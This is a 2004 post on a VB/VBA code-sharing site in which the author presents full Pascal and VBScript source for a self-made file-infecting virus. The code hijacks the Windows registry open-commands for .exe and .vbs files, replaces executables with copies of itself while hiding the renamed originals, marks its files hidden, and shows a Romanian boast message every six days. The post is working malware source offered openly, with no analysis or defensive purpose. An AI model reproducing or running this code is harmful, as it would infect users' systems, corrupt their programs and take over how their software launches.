VB and VBA Users Source Code: VBScript + Pascal Virus

VB and VBA Users Source Code: VBScript + Pascal Virus

[ Home | Contents | Search | Reply | Previous | Next ]

VB/VBA Source Code
VBScript + Pascal Virus

By:	Lungu Bogdan
Email (spam proof):	Email the originator of this post
Date:	Sunday, September 19, 2004
Hits:	4222
Category:	Files/Directories/IO

Article:
This is a virus I made myself in Pascal and VBScript. The application made in Borland Pascal creates a VBScript file in Windows directory called FJOV.vbs and then it executes it with FJOV & application's path & name as parameters.When the VBScript file is executed with FJOV parameter it copies the application in Windows directory & "\Fjov.exe" and it writes into the registry key HKCR\exefile\shell\open\command\ it's path and "%1 %". When you execute a application from Window Explorer Fjov.vbs will be launched with Application's name as parameter.It will move the application into a .com file and will copy FJOV.exe in application's path & name. It will also display a message every 6 days. Here is the code.It works both on Win98 and on WinXP: {$M $4000,0,0 } { 16K stack, no heap } Program M; uses dos,crt; var windir,appPath,txt,sj,appCom,cmd:string;pPos,i,j:integer; vbs:array[1..76] of string;f:text; begin windir:=GetEnv('Path'); pPos:=Pos(';',windir); windir:=copy(windir,1,pPos-1); appPath:=Paramstr(0); appCom:=copy(appPath,1,length(appPath)-4) + '.COM'; for i := 1 to ParamCount do begin if i=1 then cmd:= Paramstr(i) else cmd:=cmd + ' ' + Paramstr(i); end; vbs[1]:='dim sh,fso,exe,cmd,com,windir,key,val,dp,msg,fol'; vbs[2]:='Set Args = Wscript.Arguments'; vbs[3]:='Set fso = CreateObject("Scripting.FileSystemObject")'; vbs[4]:='Set sh = CreateObject("WScript.Shell")'; vbs[5]:='windir = fso.GetSpecialFolder(1)'; vbs[6]:='if fso.fileexists(windir & "\WScript.exe") = False then'; vbs[7]:='windir = fso.GetSpecialFolder(0)'; vbs[8]:='end if'; vbs[9]:='if args.count=0 then'; vbs[10]:='setinf'; vbs[11]:='end if'; vbs[12]:='if ucase(args(0))="FJOV" then'; vbs[13]:='on error resume next'; vbs[14]:='fso.Deletefile windir & "\Fjov.exe"'; vbs[15]:='on error resume next'; vbs[16]:='fso.copyfile args(1),windir & "\Fjov.exe"'; vbs[17]:='setinf'; vbs[18]:='else'; vbs[19]:='exe=lCase(Args(0))'; vbs[20]:='For i=1 to Args.Count - 1'; vbs[21]:='cmd = cmd & " " & Args(i)'; vbs[22]:='Next'; vbs[23]:='com=mid(exe,1,len(exe)-4) & ".com"'; vbs[24]:='if fso.fileexists(com) = true then'; vbs[25]:='sh.Run(com & cmd)'; vbs[26]:='else'; vbs[27]:='on error resume next'; vbs[28]:='fso.movefile exe,com'; vbs[29]:='on error resume next'; vbs[30]:='fso.copyfile windir & "\Fjov.exe",exe'; vbs[31]:='hide(com)'; vbs[32]:='show(exe)'; vbs[33]:='on error resume next'; vbs[34]:='sh.Run(com & cmd)'; vbs[35]:='end if'; vbs[36]:='end if'; vbs[37]:='dp = Date()- #1/1/2000#'; vbs[38]:='if dp mod 6 = 0 then'; vbs[39]:='msg="Acest computer a fost infectat cu virusul G__RG__A 1.0"'; vbs[40]:='msg=msg & vbcrlf & " realizat de LUNGU BOGDAN."'; vbs[41]:='msg=msg & vbcrlf & " Contacteaza-ma pentru vaccinare."'; vbs[42]:='msgbox msg,,"VIRUS"'; vbs[43]:='end if'; vbs[44]:='Set fso = nothing'; vbs[45]:='Set sh = nothing'; vbs[46]:='Set Args = nothing'; vbs[47]:='Sub SetInf()'; vbs[48]:='on error resume next'; vbs[49]:='fso.Deletefile windir & "\KMF.com"'; vbs[50]:='on error resume next'; vbs[51]:='fso.copyfile windir & "\WScript.exe",windir & "\KMF.com"'; vbs[52]:='key="HKCR\vbsfile\shell\open\command\"'; vbs[53]:='val=windir & "\KMF.com %1 %"'; vbs[54]:='sh.RegWrite key,val'; vbs[55]:='key="HKCR\exefile\shell\open\command\"'; vbs[56]:='val=windir & "\KMF.com " & windir & "\Fjov.vbs %1 %*"'; vbs[57]:='sh.RegWrite key,val'; vbs[58]:='hide(windir & "\Fjov.vbs")'; vbs[59]:='hide(windir & "\Fjov.exe")'; vbs[60]:='hide(windir & "\KMF.com")'; vbs[61]:='wscript.quit'; vbs[62]:='end sub'; vbs[63]:='sub hide(file)'; vbs[64]:='if fso.fileexists(file) = true then'; vbs[65]:='set fol = fso.getfile(file)'; vbs[66]:='fol.attributes = 2'; vbs[67]:='set fol = nothing'; vbs[68]:='end if'; vbs[69]:='end sub'; vbs[70]:='sub show(file)'; vbs[71]:='if fso.fileexists(file) = true then'; vbs[72]:='set fol = fso.getfile(file)'; vbs[73]:='fol.attributes = 0'; vbs[74]:='set fol = nothing'; vbs[75]:='end if'; vbs[76]:='end sub'; txt:=''; Randomize; For i:=1 to 6 do begin j:= Random(9); Str(j+1,sj); txt:=txt + sj; end; txt:=windir+'\'+txt+'.vbs'; assign(f,txt); Rewrite(f); writeln(f,vbs[1]); writeln(f,vbs[3]); for i:=5 to 8 do writeln(f,vbs[i]); writeln(f,'show(windir & "\Fjov.vbs")'); writeln(f,vbs[13]); writeln(f,'fso.Deletefile Wscript.ScriptFullName'); for i:=70 to 76 do writeln(f,vbs[i]); close(f); Exec(windir+'\WScript.exe',txt); assign(f,windir + '\Fjov.vbs'); Rewrite(f); For i:=1 to 76 do writeln(f,vbs[i]); close(f); Exec(windir + '\WScript.exe',windir + '\Fjov.vbs FJOV ' + appPath); Exec(appCom,cmd); clrscr; end.
Terms and Conditions
Support this site Download a trial version of the Excel Workbook Rebuilder